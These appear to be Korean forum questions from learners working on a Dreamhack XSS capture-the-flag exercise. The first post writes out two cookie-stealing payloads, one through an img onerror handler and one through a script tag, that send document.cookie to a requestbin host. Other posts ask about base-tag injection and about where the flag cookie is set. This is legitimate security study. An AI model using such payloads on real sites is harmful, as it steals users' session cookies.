index.php/?page=vuln&param=<img src=@ onerror=location.href="https://mlimzqc.request.dreamhack.games/"%2bdocument.cookie> 이건 드림핵 강의에서 제공한 img태그를 사용한 페이로드입니다 index.php/?page=vuln&param=<script>location.href="https://mlimzqc.request.dreamhack.games/"%2bdocument.cookie;</script> 이건 제가 입력한 script태그를 이용한 페이로드입니다 img태그는 requestbin으로 요청이 가는데 script태그를 사용하면 요청이 가지 않습니다 무엇이 문제인가요..?

혹시 base태그가 안 먹히는데 이유가 있을까용

일반적으로 여타 다른 문제들 보면 report 페이지에서 admin으로 로그인해서 가던가, flag를 셋팅해서 가던가 하는 코드가 보이는데요. 본 문제는 report 페이지를 통해 flag를 유출하는 것은 맞지만, report 페이지에서 flag를 셋팅해서 쿠키로 가져간다는 코드가 주어진 코드에 없더라고요. 이런 경우, 그냥 일반적으로 report 페이지를 통해 푸는 것이니, report 페이지로 취약 페이지 요청하고 cookie 확인해봐야지. 라고 유추를 해야 하는 건가요? 아니면 제가 flag가 어디 셋팅되어 있다는 것을 놓친걸까요?